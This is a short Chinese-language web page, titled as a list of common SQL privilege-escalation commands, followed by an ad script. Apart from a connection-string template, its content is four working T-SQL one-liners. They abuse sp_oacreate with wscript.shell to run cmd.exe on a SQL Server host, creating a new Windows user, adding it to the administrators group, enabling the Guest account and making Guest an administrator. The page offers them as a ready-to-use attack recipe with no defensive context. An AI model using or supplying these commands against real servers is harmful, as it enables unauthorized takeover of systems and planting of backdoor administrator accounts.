SQL提权常用命令

1、连接数据库

driver={SQL Server};server=服务器IP;uid=用户名;pwd=密码;database=数据库名

 

2、添加新用户

declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:/windows/system32/cmd.exe /c net user 新用户 密码 /add'

 

3、把用户加到管理组

declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:/windows/system32/cmd.exe /c net localgroup administrators 新用户 /add'

 

4、激活GUEST用户

declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:/windows/system32/cmd.exe /c net user guest /active:yes'

 

5、把Guest加到管理组

declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:/windows/system32/cmd.exe /c net localgroup Administrators Guest /add'

 

 

<script type="text/javascript"><!--google_ad_client = "pub-4717125974896180";/* 728x90, 创建于 09-7-17 */google_ad_slot = "3536088218";google_ad_width = 728;google_ad_height = 90;// --></script><script src="http://pagead2.googlesyndication.com/pagead/show_ads.js" type="text/javascript"></script>